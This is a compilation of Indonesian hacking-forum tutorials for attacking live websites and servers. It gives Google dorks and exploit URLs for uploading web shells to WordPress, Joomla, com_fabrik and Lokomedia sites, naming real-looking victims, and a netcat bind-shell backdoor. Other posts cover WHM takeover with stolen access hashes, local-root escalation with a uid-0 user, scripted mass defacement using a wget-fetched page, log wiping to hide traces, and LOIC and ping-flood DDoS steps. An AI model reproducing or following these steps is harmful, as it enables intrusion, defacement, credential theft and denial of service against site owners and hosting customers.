• Hack Web With WPStore

    Hack Web With WPStore
    oke ane newbie mau share tutor cupu
    buat para mastah mastah disini lewatin aja

    oke kita langsung saja

    dork :
    inurl:ptype=store
    inurl:ptype=cart

    dork bisa dikembangin sendiri sesuai anda

    tidak semua web bisa sukses dengan exploit ini

    epxloitnya :

    Quote:/wp-content/themes/framework/upload

    example :

    Quote:http://yourweddingdress.co.za/wp-content...rk/upload/

    jika tampilan webnya berubah menjadi gini berarti kemungkinan besar web vuln

    [Image: 1_zpsdb27a693.jpg]

    terus tinggal upload deh shell ente
    kalau belum punya shell nih gw ada shell punya IDCA
    Download
    Quote:username : root
    password : toor

    jika setelah diupload muncul kaya gini kemungkinan besar shell sudah dapat di akses

    [Image: 2_zpsf63ee955.jpg]


    lalau yg terakhir cari tempat shell yg sudah di upload tadi
    biasanya di sini

    Quote:/wp-content/uploads/products_img/[nama shell anda].php

    oke sekian tutor cupu dari saya untuk kurang lebihnya mohon maaf
    dan kalau REPOST ya hapus aja bang admin yg ganteng Ganteng

    salam saya UZUMADY GantengGanteng
  • deface dengan com_fabrik .

    Untuk para master, dedengkot, mbahnya hacker khususnya defacer, pasti sudah tidak asing lagi Exploit com_fabrik. Namun untuk newbie seperti ane pasti masih clingak-clinguk. Maka dari itu ane mau berbagi sesuatu bagi yang belom tau :)



    Oke, untuk yang belum tahu disimak ya :)

    Dork :
    inurl:"index.php?option=com_fabrik"site:.uk (silahkan dikembangkan)

    Exploit :
    index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher


    Langkah2nya :
    Buka mbah google.com
    Masukkan Dorknya tadi inurl:"inurl:"index.php?option=com_fabrik"site:.uk"
    Pilih target. Misal kita mendapat http://www.case-stores.de/index.php?opti...mp;lang=de
    Setelah menemukan target, ganti (explotasi) URLnya hingga menjadi http://www.case-stores.de/index.php?opti...1echercher
    [Image: 3_zps5c343d96.jpg]
    maka hasil nya seperti ini ,kalo tidak seperti ini mending cari yang lain :)
    Upload shell ente Dan untuk melihat shell yang telah di upload, buka http://www.target.com/media/shell.php
    [Image: 4_zps8cde2690.jpg]
    seperti ini ,sekarang kita udah masuk ke web tersebut tinggal ganti index nya :)
    [Image: 5_zpsfe8fbe56.jpg]
    dan taraaaaaaaa berhasil :)


    Mudah banget kan??? :)
    Oke, selamat berburu....
    [/b]
  • Membuat Backdor di linux



     1) siapkan 2 buah laptop sebagai percobaannya

    2)Pada kedua komputer tersebut lakukan instalasi paket netcat

    Code:
    apt-get install netcat

    3) Pada komputer target (server) buat backdoor dengan netcat
    Code:
    nc –l –p 5050 –e /bin/bash

    catatan :-l : listen, siap menerima koneksi-p : pada port berapa koneksi diterima-e : jalankan perintah terminal yaitu /bin/bashSetelah itu cek dengan perintah nmap untuk melihat bahwa port 5050 dalam keadaan terbuka di sisi server.
    Code:
    # nmap localhost

    4)Pada komputer penyerang, lakukan akses terhadap port diatas, kemudian buat account pada komputer server
    Code:
    # nc 192.168.50.10 5050debianGUI:~# nc 10.252.42.132 5050adduser datahack => buat user datahack disisi serverAdding user `datahack' ...Adding new group `datahack' (1002) ...Adding new user `datahack' (1002) with group `datahack' ...Creating home directory `/home/datahack' ...Copying files from `/etc/skel' ...datahack => buat password : datahackdatahack => retype passwordChanging the user information for datahackEnter the new value, or press ENTER for the defaultFull Name []:Room Number []:Work Phone []:Home Phone []:Other []:yIs the information correct? [Y/n] y^C

    5) Dari account yang sudah dibuat diatas, lakukan koneksi dengan telnet ke sisi server, sehingga anda sudah berhasil masuk ke sisi server.
    Code:
    # telnet 192.168.50.10
  • Download RAR Password Unlocker 4.2.0 Full Crack

    Kesempatan kali ini kita akan membahas tentang cara membuka file WinRar yang telah di password. Mungkin artikel ini bermanfaat bagi para netter yang mengalami permasalahan untuk mengekstrak file yang di kompres dengan Winrar, yaitu lupa password untuk membuka berkas filenya.

    Untuk melakukan hal tersebut dibutuhkan sebuah Tools bantu yaitu, "WinRar.PW.Remover-hs"



    Berikut cara untuk membuka File WinRar yang telah di Password :

    1. Instal Aplikasi tersebut ke dalam sistem komputer anda.

    2. Jalankan Aplikasi dimaksud.

    3. Klik tombol Open "RAR File"

    4. Pilih Metode untuk membuka Password File Rar-nya, misalnya : "Brute-Force Attack"

    5. Klik tombol Start, tunggu sejenak hingga muncul PopUp hasilnya.

    Untuk mendapatkan tools-nya silahkan Download di sini
    note: tanda * / %2A di link diatas dihilangkan buat bisa ngedownload gan

    semoga bermanfaat gan
  • Hack Web Host Manager (WHM)



    Assalammualaikum…

    Hallo sobat, lama nih ga buat tutor lagi :D rada2 males mah saya sekarang mo hacking2an.. hehehe :D  oke sekarang saya mo bahas mengenai cara Hack Web Host Manager (WHM) :p

    Apa itu Web Host Manager (WHM) ? >>>> Google aja yah :p

    Sebelum itu sobat harus bisa nanem Shell dolo, klo belum bisa gimana coba? lol :D Nah, Kalo hack WHM, disini kita butuh Config WHMCSnya  :3  ga semua web bisa nemu confignya :D nasip2an aja lol :D sebenarnya bisa juga dengan cara mengexploitasi bug pada whmcs, itu sobat pelajari ndiri yah :p  utk config killernya bisa gunain Shell idca, Garuda, hiddenymouz atau sobat bisa baca artikel kita sebelumnya Cara mencari config dalam website

    Perhatian!
    Tutorial ini dibuat sebagai pengetahuan dan pembelajaran saja, segala tindakan penyalahgunaan pada tutorial ini seperti pelanggaran hukum, pencurian dan pengerusakan, saya tidak bertanggung jawab! Use at your own risk! 

    Pesan Onix AQua:
    Gunakan ilmu dengan sebaik2nya, karena 1 kebaikan yg kalian buat, maka 1000 kebaikan yang akan kalian dapatkan. dan juga sebaliknya, jika 1 keburukan yang kalian lakukan, maka 1000 keburukan akan selalu kalian dapatkan selama hidup!

    Berikut bahan2 yg sobat butuhkan:

    1. Web Shelled 
    2. Whmcs killer 
    3. Config whmcs

    Disini saya udah nemu config WHMnya :


     isi dalamnya seperti :



    Kemudian kita buka whmcs killer yang sudah di upload ke dalam web. lalu klik Submit!



    Nah, kita sudah masuk tuh, :D silahkan liat2 yoo :p


    Akun WHMnya ada di H0st R00t, dan akun CPanelnya ada di Client Hosting Account


     Tinggal login aja, :p buka IP:Port dan untuk loggin ke WHM digunakn port 2086/2087

    cth: 176.32.342.223:2086



    udah pada bisa kan?  kalo ga bisa juga face factor pastinya :p nah, bagaimana kalo ga bisa loggin pake akun yang udah kita dapat? :o itu artinya password telah diubah oleh administratornya. kalo sobat menemukan kasus seperti ini, sobat bisa gunakan cara berikut:

    Pertama sobat install dolo Addons firefox yang namanya Modify Header, klik aja disini



    kemudian sobat liat di whmcs killer tadi pada kolom Access Hash.

    Silahkan disusun sejajar dengan format : WHM username:AccessHash lihat gambar!



    kemudian buka Modify Header, klik Select Action pilih Add. isi seperti berikut:

    Header Name : Authorization
    Header Value : WHM username:AccessHash



     Lalu save, dan klik Enable, kalo udah ada tanda hijau lalu klik Start


    Setelah itu tinggal sobat buka WHMnya.. IP:Port



    Mudah kan? :D semoga saja tutorial ini bermanfaat dan tidak disalahgunakan :) kalo disalahgunakan resiko dan Dosanya tanggung sendiri yah? :p Spesial big thanks to : Mauritania Attacker :* saya dapet ilmu dari blognya :3 dan sekian tutorial dari saya yah,  maaf kalo masih semerawut :D  

    CREDIT : ONYQ AQUA
  • JAVA HOW TO SEND HTTP POST/GET REQUEST

    Halo,lama ga temu ama akuh Ngakak
    sibuk ngegame :v
    oke ini aku pengen kita diskusi tengan HTTP POST/REQUEST di programming java
    jadi pastiin kalo kamu udah ngerti tentang HTTP POST/REQUEST

    biasanyakan kalo kita buka website atau masukin login info make browser
    nah ada kalanya kita pengen auto submit login info atau data kita ke server
    contohnya pengen bikin brute password,bikin akun suatu website secara massal,atau kalo udah naek dikit,kita bisa bikin auto cek credit card[if you know what

    i mean Ngakak ]

    semua semua itu butuh HTTP POST/GET REQUEST,karna itu yuk kita liat2 gmn java mengirim HTTP POST/GET data.

    aku make library HttpClient 4.2.5 downloadnya di sinih http://hc.apache.org/downloads.cgi

    "oke konsepnya gini,kita punya link yang ingin kita buka sambil mengirim data"

    kita bikin di localhost dengan nama test.php


    PHP Code:
    <?php
    $nama 
    $_POST['nama']; // mengambil variable nama yang di kirim melalui http postif ($nama =="")
      {
        echo 
    "Hallo " .$nama;
       }
    else
     {
        echo 
    "client tidak mengirim variable nama";
     }
    ?>
    oke udah jelaskan,berarti link itu mengambil variable nama,berarti kita mengirim variable nama menggunakan java

    pastikan library HttpClient di project java kamu.

    ini contoh basic pengiriman post http menggunakan java
    ini contoh basic pengiriman post http menggunakan java
    Code:
    /*
    * To change this template, choose Tools | Templates
    * and open the template in the editor.
    */
    package hn_httprequest;

    import java.io.BufferedReader;
    import java.io.InputStreamReader;
    import java.util.ArrayList;
    import java.util.List;
    import org.apache.http.Consts;
    import org.apache.http.HttpEntity;
    import org.apache.http.HttpResponse;
    import org.apache.http.NameValuePair;
    import org.apache.http.client.entity.UrlEncodedFormEntity;
    import org.apache.http.client.methods.HttpPost;
    import org.apache.http.impl.client.DefaultHttpClient;
    import org.apache.http.message.BasicNameValuePair;

    /**
    *
    * @author xb
    */
    public class Main {

        /**
         * @param args the command line arguments
         */
        public static void main(String[] args) {

            try {
                //ini alamat host/file yang kita minta/buka
                String link = "http://localhost/test.php";
                //deklarasikan http clientnya
                DefaultHttpClient httpclient = new DefaultHttpClient();
                //deklarasikan http responsennya
                HttpResponse response;
                //deklarasikan http postnya,ini untuk handle pengiriman requestnya
                HttpPost httpost = new HttpPost(link);
                //bikin array untuk tempat pengisian data yang mau di kirim
                List<NameValuePair> data_post = new ArrayList<NameValuePair>();
                //lalu masukan value post yang mau di kirim,pada kalo ini kita masukin variable nama dengan value dika_xb
                data_post.add(new BasicNameValuePair("nama", "DIKA_XB"));
                //masukan array yang berisi data yang mau di kirim ke httpost
                httpost.setEntity(new UrlEncodedFormEntity(data_post, Consts.UTF_8));
                //kirimkan data,lalu ambil respon dari server dengan httpresponse
                response = httpclient.execute(httpost);
                //ini deklarasi untuk mendapatin elemen elemen data yang udah kita ambil di httpresponse
                HttpEntity entity = response.getEntity();
                //oke kita coba untuk menampilkan respon server/halamannya
                StringBuilder sb = new StringBuilder();
                BufferedReader rd = new BufferedReader(new InputStreamReader(response.getEntity().getContent()));

                int linex;
                while ((linex = rd.read()) != -1) {
                    sb.append((char) linex);
                }

                //kita tampilkan status respon server,apakah dia 404 atau yg lain
                System.out.println("respon : " + response.getStatusLine());

                //kita tampilkan html responsenya
                System.out.println(sb.toString());
            } catch (Exception e) {
                System.out.println("error " + e);
            }
        }
    }


    result
    run:
    respon : HTTP/1.1 200 OK
    Hallo DIKA_XB
    BUILD SUCCESSFUL (total time: 0 seconds)

    [Image: 1240199_4679724971405_1987862796_n.jpg]

    nah terus gmn cara tau website itu minta variable apa aja ?
    gunakan tamper data saat post data,jadi kita bis lihat server minta variable apa saja
    Ngakak
    httpclient jg support cookie,jadi kita bisa seperti browser biasa.
    monggo aku jg masih belajar,diskusi bareng bareng
  • 4 trik Cara Upload Shell di Joomla

    kali ini ane mo share bbrpa trik buat upload shell di CMS joomla. mungkin udah pada tau yaa.. (ato mungkin repost)
    kali aja ada yg belom tau, kaya newbie seperti ane. Mentok

    okedeh, langsung ke tutorialnya aja.
    pertama, yang pasti udah dapet akses ke admin panel joomla nya. ane ga bahas gimana cara dapetin akses admin nya. entah SQLi, jumping, symlink, ,etc.

    CARA 1
    masuk ke menu site > global configuration. trus klik bagian system
    perhatikan bagian media setting,
    trus di sub bagian
    [+]Legal Extensions (File Types) kita tambahkan ekstensi php kedalamnya
    [+]Restrict Uploads --> pilih NO
    [+]Check MIME Types --> pilih NO
    [+]Legal Image Extensions (File Types) kita tambahkan ekstensi php kedalamnya
    [+]Legal MIME Types --> tambahin image/php

    klo udah save. stelah itu..
    pergi ke media manager (site > media manager) upload shellnya disitu.

    udah ke upload Cheer , lokasi shell ada di http://korban.com/images/namashell.php

    CARA 2
    secara konsep sih sama, disni ane dpetnya joomla versi 1.5.18 , klo versi yg laen.. silakan menyesuaikan. :P
    Klik menu Extension > template manager

    trus pergi di bagian administrator.

    kemudian seleksi nama template admin yg aktif, trus klik edit. klo udah pilih lagi edit html.
    kan udah muncul tuh editornya, tinggal kita sisipin aja uploader.
    buat yg belom punya uploader, bisa ngambil disini --> https://www.dropbox.com/s/00ahiykruwdpm3...der.txt... yang ane inget ini yg d kasih om vergos303

    mari kita sisipin uploadernya, ane taro dibawah aja.

    klo udah. save aja.
    sukses. dan uploader kita udah nongol dibawah :) tinggal kita upload shell kita.

    setelah upload shell, kita coba akses shell kita. letak file yg udah di upload, itu ada di http://korban.com/administrator/namashell.php

    CARA 3
    masi dlm masalah edit mengedit template. kali ini kita pake cara edit template yg laen.
    kita ke extension > template manager. kali ini kita edit template site nya. tp bukan yg sedang dipakai. (klo yg template admin td kan nyari template yg lg aktif)
    skrng kita pilih template site yg sedang tidak aktif. (tanda kalo template itu aktif, ada tanda bintangnya)
    klik aja nama template yg ga aktif. misal: beez
    trus pilih edit html. klo udah muncul editornya, langsung dah kita replace dengan script shell kita

    klo udah silakan disave. nah.. skrng kita coba menuju shell kita.
    letak posisi shell uda ane jelasin di gambar diatas. yaitu : http://korban.com/templates/beez/index.php

    CARA 4
    lagi lagi pake template.
    kali ini kita coba upload template baru yg udah kita sisipin shell.
    cari aja sembarang template joomla, sesuaiin kompatibilitasnya dg versi joomlanya.
    contoh : ane download template siteground. klo udah, ekstrak aja templatenya. trus masukin shell kita. terserah mo ditaro dimana
    misal: di dlm folder images/namashell.php

    klo udah kita archive lg templatenya. bentuknya *.zip ya..
    klo udah oke, kita upload ke korban.
    masuk ke extension> install/uninstall trus upload dah, template kita td :P
    setelah sukses upload. skrng kita cek, dimana lokasi shell kita. masuk ke template manager. trus klik nama template yg baru saja kita tambahin.
    ane td install template siteground. liat bagian kanan, ada parameters.

    bagian merah, itu lokasi shell kita. tinggal kita sesuaiin dimana kita naro shellnya td. klo ane td masukin di folder images.
    jd lokasi shellnya ada di http://korban.com/templates/siteground-j...ashell.php

    hmmhh.. baru segitu cara ane,
    mari diskusi disini, cara cara yg laennya. yang punya trik laen (kalo mau sih) share juga dimari.
    soalnya pernah juga nemu site yg kgak bisa pake ke empat cara diatas.

    okedeh, sekian tutorial cupu bin jadul. dr ane.

    ini buat joomla versi 2.5.x
  • rooting - manual mass defacing (black Buntu)

     Anak baru numpang posting yah,. ok langsung aja yah ga usah pake basa basi,.
    pertama kmu backconect dlu ke shell mu,. terserah mau pke apa keq,. nc atau bind shell,. disni aku make bind shell,.
    comand2'a, lihat aja di gambar,..
    [Image: Screenshot.png]

    setelah check kernel n segala macem'a,.. kmu upload localroot yg pas sama kernel di shell mu,. trus kasih chmod 777 di tuh local,
    [Image: Screenshot-1.png]

    tggal jalanin deh local yg sdah kmu upload tadi,.
    [Image: Screenshot-2.png]
    klo berhasil ke root, mka id'a berubah, sperti gambar yg di atas,.

    tahap akhir'a,. tggal add usermu aja distu,.
    [Image: Screenshot-3.png]

    klo udah berhasil,. jadi'a kek gini
    [Image: Screenshot-4.png]

    penjelasan'a,..

    PHP Code:
    adduser -u 0 --g 0 -G 0,1,2,3,4,6,10 -M ftp-user
    adduser 
    comand untuk nambahin user-u 0 -set user jadi dngn ID nol (0root.
    -
    g 0 set initial group dengan ID nol (0root.
    -
    G 0,1,2,3,4,6,10 set additional group ke:root
    bin
    daemon
    sys
    adm
    disk
    10 
    wheel-M – ‘home directory’ tidak di create ke user.ftp-user username dri user yg mau dipke 

    sekrang apa lagi,.??
    ya terserah mau kalian apakan,. ntah itu mau di jual, mau di pke sndri, atau mau di deface,.
    klo mau di deface, kita lanjut lagi,. :D

    login di putty dan masukan ip server dan port yang mau kita mass deface,..
    [Image: 52fe6d4c3f5f4e5fa6271db.png]

    sekarang kita masuk ke "etc/httpd/conf" untuk mengambil semua nama website n user yang ada di sever.. kita masukan comand berikut :
    PHP Code:
    cd /etc/httpd/conf 

    setelah itu kita ambil semua nama web yg ada di server dan mengcopy'a di shell kita dengan nama "web.txt" (terserah sih mau pke nama apa)
    comand'a :
    PHP Code:
    cat httpd.conf grep -i ServerName > /home/NamaUser/public_html/web.txt 
    untuk NamaUser, klian bisa lihat di shell kalian masing2...

    [Image: HdghNpj.png]

    sekarang kita ambil lagi nama2 user'a, kemudian copy semua user yg ada di dalam user.txt ke notepad..
    comand'a :
    PHP Code:
    cat httpd.conf grep -i DocumentRoot > /home/NamaUser/public_html/user.txt 

    [Image: 88f8750f45984456a704565.png]

    setelah itu kita kembali ke dir root, dan buat dir baru (terserah mau pke nama dir apa, disini saya pke nama dir bie) dan kita masuk ke dir baru yg kita buat itu, dan kita download deface page kita ke dalam dir yg baru kita buat itu,..
    comand'a :
    PHP Code:
    cd /rootmkdir biecd bie
    wget http
    ://blablabla.com/deface.html 
    [Image: 0OSGSIS.png]

    ok,. kita sudah pnya deface page, sekarang kita buat file mass.sh kita dulu,..
    ganti semua tulisan "DocumentRoot" dengan "cp defacepage.html" disni yg perlu kita perhatikan, bila kita mau taruh file deface kita di index, mka kita menggunakan "cp index.html" bila gak, klian bisa mengganti'a dengan nama file yg lain,.. disini aku pke "bie.htm"
    [Image: qm0DEhe.png]

    kemudian kembali ke putty kita, ketik comand "nano mass.sh" lalu copas semua nama users yg sudah kita ganti tadi, setelah itu ketik control "o", enter, trus control "x" untuk kmbali,..
    setelah itu kita berikan perm 777 pada mass.sh kita, lalu jalankan mass.sh kita
    PHP Code:
    chmod 777 mass.sh; ./mass.sh 
    [Image: 68beffb40e24488ba47018b.png]

    yep,.. selese mass deface'a,..
    sekarang kembali ke dir root, lalu hapus dir baru yang kalian bikin tadi
    lalu jalankan log cleaner kalian, trus exit.. :)
    [Image: 1Jv4i7e.png]

    log cleaner bisa klian dapet dsini : http://pastebin.com/Csfw9BrY
    cara pke'a :
    1. Copy source log cleaner'a di notepad lalu save dengan nama remove.c trus perhatikan
    [Image: bHx73vo.png]

    Harap diingat bahwa tidak selalu file2 wtmp utmp dan lastlog berada pada posisi yang sama jadi jangan lupa cek apakah posisi file2 wtmp utmp dan lastlog sudah sesuai dengan source remove.c log'a atau belum,..
    Kamu bisa gunakan perintah untuk mencari dima posisi2 file wtmp utmp dan lastlog :
    PHP Code:
    find / -name wtmp -printfind / -name utmp -printfind / -name lastlog -printatau
    whereis wtmp
    whereis utmp
    whereis lastlog 


    Kemudian ganti posisi file2 tersebut di remove.c yg sudah kamu save di notepad tadi sesuai dengan hasil diatas,..

    2. Setelah kita rubah, upload ke server / site yg sudah kita root tadi,. saat'a kita compile,. atau bisa jga sekalian compile di desktop (bagi pengguna linux)
    PHP Code:
    gcc remove.-o remove -DGENERIC
    remove
    .cIn function `main':
    remove.c:50: warning: return type of 
    `main' is not `int'/tmp/ccZVzySI.oIn function `main':
    /tmp/ccZVzySI.o(.text+0xb4): the 
    `gets' function is dangerous and should
    not be used. 
    dan terakhir kita jalankan remove'a,. :)
    PHP Code:
    ./remove namarootuser 

    trus tggal masukin pilihan'a,.. :)
    [Image: 8CITRjF.png]

    terkhir, kita ganti semua tulisan "SeverName" dengan "http://"
    [Image: 312181284964474c9cc8a3f.png]

    Tool :
    shell yg aku pke diatas : http://pastebin.com/0N805eLE
    log cleaner : http://pastebin.com/Csfw9BrY
    NC : http://joncraton.org/media/files/nc111nt.zip
    puttty : http://portableapps.com/apps/internet/putty_portable

    Ps : Tut diatas terdiri dari 2 bagian, tapi saya jadikan satu,. jadi mohon maaf klo kepanjangan,.. :D
    untuk weduser (windows user), sama aja koq kyak di atas comand2'a,.. gak jauh beda...
    paling beda'a klo di windows pas mau gunain nc'a doank,.
    harus masuk di dir nc dlu kan bru bisa gunain bind atau mau back conect...
    dah gtu aja,.. moga berguna yah,.. :)

    credit : my best teacher Google
  • Deface Lokomedia Dengan JS Overlay dan Shell



    Tutorial kali ini saya akan membahas tentang deface web dengan JS Overlay dan Nanem Shell di Web, kalo buat sesepuh mahh udah lewat ajaa :D

    Langsung aja ke tutorial

    Dork yang sering saya pakai buat Cari Lokomedia
    inurl:/media.php?module=berita
    inurl:/admin/foto_berita
    inurl:/admin/content.php?module=user
    inurl:/adminweb/

    1.Search Google Pakai Dork Diatas

    2. Kalo ketemu langsung aja ke exploit
    http://site/admin/content.php?module=user

    3. Kalo Muncul Kaya begini
    [Image: 2rnddll.png]

    berarti belum di patch tuh ama adminnya Sleepy saatnya kesempatan kita

    4. Langsung aja Klik Pilihan Edit
    nanti akan jadi kayak gini
    [Image: 2mnnjn8.png]
    Edit Sesuka hati anda, lalu klik save, Nanti akan otomatis disuruh login lalu login pakai ID & Pass yang sudah diganti tadi..

    5. Kalo udah muncul kayak gini, terus di gmana'in ?
    [Image: wj7whl.jpg]
    Tinggal di Deface, Caranya? bisa pakai cara JS Overlay atau Tanem Shell


    Berikut Tutorialnya

    JS Overlay

    Buat dulu file JS atau apa pada website anda, bisa pakai site gratisan atau site yang sudah anda tanem shell

    terus buat file misalkan devilscream.js
    lalu isikan Script berikut

    http://newbie-security.or.id/code/js-overlay.txt


    Nah, biar Web Lokomedianya ke deface gmana?

    Pada CMS Lokomedia masuk ke Menu Berita.
    Kalo gak ada pilihan menu berita langsung ke URL

    http://site/admin/media.php?module=berita

    Kalo kagak bisa yah kagak bisa Dodgy

    Lalu klik Add New Berita

    Pada Bagian judul masukan Script berikut :
    Code:
    http://situs-anda-menyimpan-file-js-overlay/devilscream.js

    Isi atau lainnya gak usah di isi gak apa-apa

    Setelah itu save, percuma kalo gak di save Dodgy

    Tanem Shell

    Masuk ke Bagian menu Banner kalo gak ada juga pake URL http://site/admin/media.php?module=banner
    kalo gak bisa juga yah emang nasib Dodgy

    Atau gak cari Menu yang bisa upload file
    [Image: 10i9nrp.jpg]

    Setelah itu Klik AddNews

    Pada Bagian Browse File Pilih Shell Kalian, yang lainnya gak usah diisi..

    [Image: 2ikwcya.jpg]


    Setelah di Upload masukin URL kaya gini
    http://site/admin/foto_berita/nama_shell.php

    kalau misalkan anda bukan di banner uploadnya
    biasanya berada di http://site/files/nama_shell.php

    Nah setelah itu Oprek deh Websitenya


    Mungkin hanya itu tutorial saya, kalo ada salah maaf ya Cool

    Thanks buat : BagsFreak untuk script JS-Overlay nya Big Grin

    Sekian dan terima kasih...

    SUMBER : Newbie Security
  • pngertian DDOS

    oke kali ini saya akan membahas tentang pengertian ddos dan cara penggunaan'a =)) karna barusan ada yg menanyakan apa itu ddos =)) langsung to the point aja

    apa sih DDOS itu?
    Serangan DDOS ( Denial Distribute of services ) Attack, mungkin adalah serangan yang paling simple di lakukan namun efeknya sangat berbahaya.
    Situs-situs besar seperti yahoo.com , ebay.com , hotmail.com, e-gold.com , 2checkout.com dan lain-lain pernah mengalami serangan yang mengakibatkan situs nya tidak bisa di akses selama beberapa jam.

    Yang terbaru adalah situs e-gold.com pada tahun 2005 kemarin, situs nya di serang dengan memakai metode DDOS ( Denial Distribute of services ).

    Bagaimana cara kerja DDOS ?

    Jika Anda memakai program windows , coba lakukan ini di komputer Anda.

    1. Start , Programs , Accessories , Command Prompt
    2. Kemudian di Command prompt ketikan , Ping -t http://www.situsyangdituju.com

    atau bisa juga Start, Run , Ping -t http://www.situsyangdituju.com

    Kemudian komputer Anda akan mengirimkan paket informasi ke situs yang di tuju tadi, pada dasarnya dengan perintah tersebut komputer Anda mengirimkan ucapan "Halo , apa ada orang di situ ? " , ke situs yang di tuju tadi. kemudian server situs yang di tuju tadi mengirimkan jawaban balik dengan mengatakan : "ya, di sini ada orang"

    Sekarang bayangkan, jika ada ribuan komputer, dalam waktu bersamaan melakukan perintah tersebut di situs yang di tuju. 1 komputer mengirimkan data sebesar 32 bytes / detik ke situs yang di tuju. Jika ada 10.000 komputer yang melakukan perintah tersebut secara bersamaan, itu artinya ada kiriman data sebesar 312 Mega Bytes/ detik yang di terima oleh situs yang di tuju tadi.

    Dan server dari situs yang di tuju tadi pun harus merespon kiriman yang di kirim dari 10.000 komputer secara bersamaan. Jika 312 MB/ detik data yang harus di proses oleh server, dalam 1 menit saja, server harus memproses kiriman data sebesar 312 MB x 60 detik = 18720 MB. Bisa di tebak, situs yang di serang dengan metode ini akan mengalami Over Load / kelebihan data, dan tidak sanggup memproses kiriman data yang datang.

    Pertanyaan nya , bagaimana 10.000 komputer tersebut bisa ikut melakukan serangan?

    Komputer-komputer lain yang ikut melakukan serangan tersebut di sebut komputer zombie, dimana sudah terinfeksi semacam adware. jadi si Penyerang hanya memerintahkan komputer utamanya untuk mengirimkan perintah ke komputer zombie yang sudah terinfeksi agar melakukan Ping ke situs yang di tuju. Oleh karena itu pentingnya ada firewall di komputer anda, untuk memonitor paket yang keluar maupun yang masuk dari komputer anda.
    Jika anda belum memiliki firewall bisa coba zone alarm, silahkan download KLIK DI SINI
    Adware biasanya di dapat dari program-program gratisan yang anda download, untuk itu juga harus berhati-hati mendownload program gratisan.

    Bagaimana jika ada situs yang mengklaim situsnya sedang di serang , bagaimana kita tahu itu benar atau bohong ?

    Bisa kita lakukan analisa untuk mendeteksi benar atau tidaknya serangan tersebut terjadi, atau hanya mengaku-ngaku saja.

    Jika anda berkecimpung di dunia Investment semacam HYIP, autosurf , atau pun situs investasi lainnya.

    biasanya sering anda jumpai ada situs yang adminnya bilang situsnya sedang di serang pakai metode DDOS, dan terpaksa harus menutup situs nya, ujung-ujungnya yah admin tersebut melakukan SCAM, atau tidak membayar membernya.

    Berikut tahap-tahap melakukan analisa benar atau tidaknya situs tsb di serang.

    1. Beri Nilai kemampuan finansial dari situs investasi tersebut.
    - Sekarang ini sudah banyak jasa penyedia ANTI DDOS , biaya nya pun cukup mahal yakni berkisar $600 / bulan sampai dengan $1000 / bulan.

    sekarang anda nilai situs tersebut, apakah mampu membayar jasa tersebut atau tidak. Jika bisnis nya bernilai ratusan ribu dollar , masak sih tidak mau ngeluarin uang $600 / bulan untuk mengamankan situs nya ? Sering anda lihat kan , ada situs investasi yang menulis :

    Total investasi : sekian ratus ribu dollar
    Total Withdrawal : sekian ratus ribu dollar

    Jika benar uangnya sebanyak itu, tentu tidak ragu untuk membayar services ANTI DDOS sebesar $600 / bulan.

    2. Periksa kebenaran.
    Jika situs tersebut mengklaim mereka memiliki dan menyewa services ANTI DDOS, tanyakan di mana mereka menyewanya . biasanya di situs penyedia layanan ANTI DDOS di tulis nama-nama client yang menggunakan atau memakai services mereka.

    3. Periksa hostingnya, apakah menggunakan satu private IP address, atau shared IP address.
    Private IP address artinya = 1 nomor IP untuk 1 domain
    Shared IP address artinya = 1 nomor IP untuk BANYAK DOMAIN.

    sebagai contoh :
    situs semuabisnis.com menggunakan shared IP address. IP untuk domain semuabisnis.com adalah http://75.126.30.10/ dan ada sekitar 14 domain / situs yang menggunakan IP ini , salah satunya adalah ambri-servers.com

    Jadi jika situs semuabisnis.com di serang, maka efeknya akan terasa juga di ambri-servers.com maupun di situs-situs lainnya yang memiliki IP yang sama dengan semuabisnis.com

    Jika semuabisnis.com mengaku di serang, namun anda masih bisa mengakses ambri-servers.com ataupun masih bisa mengakses situs lainnya yang memiliki IP yang sama dengan semuabisnis.com , maka itu tidak benar paling cuma buat gaya-gayaan.. hehehe.

    Begitu juga dengan situs investasi yang mengaku situs nya di serang, coba periksa ip addressnya. menggunakan private IP atau shared IP. jika shared IP, coba periksa situs lainnya yang memiliki IP
    yang sama dengan situs investasi tersebut. apakah situs lainnya masih bisa di akses atau tidak.

    Jika seseorang melakukan serangan ke semuabisnis.com , maka yang tidak bisa di akses bukan hanya situs semuabisnis.com melainkan situs-situs lainnya yang memiliki IP address yang sama akan mengalami overload juga.

    Untuk mengecek dia menggunakan Shared hosting atau tidak, lakukan ini.

    PING -t situsyangdituju.com

    kemudian catat no ip.yg muncul di command prompt.
    Setelah itu periksa ip tersebut di http://whois.webhosting.info/no IP jika hanya muncul satu domain, maka IP tersebut khusus untuk 1 domain ( private IP )
    Jika banyak nama-nama situs yang muncul, maka IP tersebut adalah 1 IP untuk banyak domain ( shared IP )

    Cara Melakukan DDoS Attack

    serangan ini tidka dapat dicegah karena memang keroyokan alias ya berdo’a saja supaya situs kita tidak down akibat kena serangan DDoS Attack. ada pun cara untuk melakukan DDoS Attack sangat-sangat mudah, bahkan anak SMP pun bisa melakukanya. untuk mereka yang menggunakan OS Windows dapat menggunakan dua cara. cara pertama adalah dengan menggunakan software bernama Low Orbit Ion Cannon.(308 kb)program ini tidak perlu diinstall cukup jalankan seperti program portable lainya.
    1. Jalankan program
    2. Setelah muncul Jendela di bagian URL masukan situs yang ingin diserang misalkan http://www.coba.com, lalu klik lock on
    3. setelah itu klik tombol IMMA CHARGIN MAH LAZER
    4. silakan lihat hasilnya dibawah, disana terdapat keterangan berapa jumlah packet yang connecting, requesting, downloading, downloaded, requested dan failed.
    5. jika berhasil berarti berarti pada bagian yang failed seharusnya banyak , yang menandakan bahwa server telah down.
    [Image: zxzy.jpg]
    cara kedua adalah dengan membanjiri Ping melalui command promt alias CMD. buka start->run dan ketikan cmd, atau tekan kombinasi tombol Windows + R dan ketik cmd, kemudian enter. setelah jendela Command Prompt muncul ketikan
    #ping target.com
    setelah itu akan muncul nomor ip dari situs tersebut, anggaplah nomor ip adalah 192.168.1.1, kemudian saatnya melakukan serangan ke sistem server hosting target.com.
    #ping 192.168.1.1 -l 39999 -n 10000000 -w 0.00001
    yang berarti :
    n = besarnya Ping , nilai “10000000″ silakan diubah sesuai dengan yang diinginkan .
    192.168.1.1= ganti alamat ip dari situs target.com
    -W 0,00001 = Ini adalah periode waktu tunggu antar satu ping.
    dua cara tadi jika anda di windows, bagaimana jika di linux, hal ini jauh lebih mudah untuk dilakukan tapi hal pertama yang harus dimiliki adalah hak sebagai root. silakan ketika command ini di terminal linux.
